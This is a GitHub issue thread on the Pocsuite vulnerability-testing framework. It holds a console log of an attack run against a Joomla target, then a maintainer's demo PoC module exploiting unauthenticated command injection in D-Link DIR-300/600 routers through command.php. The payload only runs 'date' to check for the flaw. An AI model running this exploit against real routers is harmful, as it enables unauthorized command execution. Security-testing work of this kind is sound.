search

knownsec / Pocsuite

This project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.
http://pocsuite.org
1.83k stars 607 forks source link

Error: 'TestPOC' object has no attribute 'result' #118

Closed nixawk closed 8 years ago

nixawk commented 8 years ago 
Pocsuite> help

Core Commands Menu (help <command> for details)
===============================================
attack          Attack mode, sends exploit payload
back            Move back from the current Interpreter
banner          Display an awesome framework banner
debug           Enter into python debug mode
exit            Exit the current interpre
help            Show help menu
pocadd          Load available poc(s) from a directory or a file
pocdel          Unload specific poc file(s)
poclist         Show all available pocs / task pocs
seebug          Download pocs from seebug with API Token
set             Set key equal to value
show            Show available options / modules
verify          Verify Mode, checks if a vuln exists or not

Pocsuite> pocadd /tmp/dp.py
Pocsuite> poclist

   IMPORTED-ID POC-PATH
   =========== ========
             1 /tmp/dp.py

   POC--STATUS POC-PATH
   =========== ========
            ok dp.py

Pocsuite> set url http://192.168.1.100
Pocsuite> attack
[01:14:58] [*] setting the HTTP timeout
[01:14:58] [*] checking dp
[01:14:58] [*] poc:'dp' target:'http://192.168.1.100'
http://192.168.1.100/index.php/system/temporary/?file=config.tar.gz
[01:15:03] [-] 'TestPOC' object has no attribute 'result'
[01:15:03] [-] poc-12345 'Joomla com_jotloader - Full Path Disclosure Vulnerability' failed.
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
|      target-url      | poc-name | poc-id | component | version |                       status                      |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| http://192.168.1.100 |    dp    | 12345  |   Joomla  |  2.2.1  | Error: 'TestPOC' object has no attribute 'result' |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
success : 0 / 1
nixawk commented 8 years ago

If it appears, please check your poc format carefully. Please read the demo module - dlink_command_php_exec_noauth.py.

#!/usr/bin/python
# -*- coding: utf-8 -*-

# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def send_command(url, cmd):
    try:
        httpreq = req.Session()
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'User-Agent': 'GoogleSpider'}
        resp = httpreq.post(url, headers=headers, data='cmd=%s' % cmd)
    except:
        resp = None
    return resp

class TestPOC(POCBase):
    name = 'Multiple Vulnerabilities in D-Link DIR-600 and DIR-300'
    vulID = '78176'  # https://www.seebug.org/vuldb/ssvid-78176
    author = ['debug']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['http://www.s3cur1ty.de/m1adv2013-003']
    desc = '''The vulnerability is caused by missing access
           restrictions and missing input validation in the cmd
           parameter (command.php) and can be exploited to inject
           and execute arbitrary shell commands.'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'D-Link'
    appVersion = 'DIR-300, DIR-600'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''

        # Exception handler are not a must here, as follow
        #  -----------------
        # try:
        #     ....
        # except Exception as e:
        #     ....
        #
        # ------------------
        # 
        # Framework can handle them for you, please check the code:
        #     https://github.com/knownsec/Pocsuite/blob/dev/pocsuite/lib/core/poc.py

        result = {}
        self.url = self.url + '/command.php'

        resp = send_command(self.url, 'date +%Y%m%d')
        if resp and resp.text and resp.status_code == 200:
            date = resp.text.strip()
            if len(date) == 8 and date.isdigit():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)